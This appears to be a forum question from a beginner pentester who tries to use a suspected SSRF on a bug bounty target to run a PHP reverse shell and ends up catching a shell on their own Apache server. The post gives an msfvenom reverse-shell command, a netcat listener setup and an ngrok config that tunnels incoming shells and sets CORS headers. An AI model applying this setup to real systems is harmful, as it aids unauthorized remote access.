How did I manage to reverse shell my own machine?

How did I manage to reverse shell my own machine?

Beginner pentester here.

I'm testing a bug bounty website and found a potential SSRF by url injection trying to fetch for another server in the PSF, which leads the server's backend to send several POST requests to said url (tested using webhook.site)

My plan is to serve the target website with a "reverse_shell.php" using an apache server, and to listen with netcat on a different port. The problem is that I'm behind a router

To avoid opening a port, I used ngrok two with endpoints, a TCP endpoint forwarding data to netcat and an HTTP endpoint to forward the apache server. The reverse_shell.php is directed at the TCP endpoint of ngrok. Testing with sleep.php file <?php sleep(10) ?> did yield the wanted outcome:

Even though I get a CORS error, it seems the site is executing the code. Here's the error description from the console (not sure it's relevant):

Access to fetch at 'https://ngrokendpoint.com/sleep.php?q=' from origin 'https://targetsite.com' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is present on the requested resource. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled.

When I attempt to exploit, I get a shell - but as www-data of my own apache server (very anti-climactic). Got the same result when running reverse_shell.php on a different "victim" machine.

Is there something I'm missing? Also, this feels a bit too complicated, What is the best way to reverse shell when running a reverse shell from behind a router? Is there an easier way? Maybe some way not to do it behind the router?

Update: When I manually run the shll.php from a "victim" machine everything works well. Sadly, I don't have that kind of access to the target website's machine.

Reverse shell php: msfvenom -p php/reverse_php

Config file ngrok.yml:

version: 3
agent:
  authtoken: ---redacted---
endpoints:
  - name: out_tunnel_name
    url: redacted.ngrok.com
    upstream:
      url: 80
    traffic_policy:
      on_http_request:
        - actions:
          - type: add-headers
            config:
              headers:
                Access-Control-Allow-Origin: https://Targetsite.com
                content-type: Application/x-httpd-php
                sec-fetch-mode: no-cors
  - name: in_tunnel_name
    url: tcp://tcp.eu.ngrok.io:redactedport
    upstream:
      url: 1337
      protocol: tcp